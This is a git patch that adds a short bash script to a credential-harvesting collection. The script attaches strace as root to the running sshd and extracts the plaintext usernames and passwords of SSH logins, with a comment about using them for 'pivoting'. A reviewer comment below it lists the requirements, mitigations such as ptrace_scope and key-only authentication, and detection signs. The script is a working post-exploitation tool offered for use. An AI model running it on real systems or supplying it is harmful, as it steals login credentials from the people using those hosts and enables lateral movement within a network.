From 5f45ca1e0f951283310f92ea0062ec46919c8c89 Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 17:59:47 -0700
Subject: [PATCH] strace to print user / password of ssh logins
---
Get-Passwords/sshstrace.sh | 8 ++++++++
1 file changed, 8 insertions(+)
create mode 100644 Get-Passwords/sshstrace.sh
diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
new file mode 100644
index 0000000..2e18fde
--- /dev/null
+++ b/Get-Passwords/sshstrace.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+#
+# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
+# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
+# I've noticed some passwords seem to have an 'r' inserted before them. No idea why...
+#
+
+strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'
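Review bot: The header comment does not record what the technique depends on or how it shows up on the host, which is what a reader hardening or monitoring sshd needs from this file. It works only because sshd handles the plaintext password during password authentication and because root may ptrace-attach to the daemon, so I would add `# Requires root (CAP_SYS_PTRACE) and password auth; attach is refused when kernel.yama.ptrace_scope=3, and key-only auth leaves no password to read.` A second line such as `# Visible to defenders: ptrace syscalls in the audit log, and a non-zero TracerPid in /proc/<sshd pid>/status while attached.` would cover detection. The descriptor number in `write(4, ...)` and the `/var/run/sshd.pid` path are also hard-coded without comment, so the header should say that both are assumptions about the sshd build and distribution this was observed on.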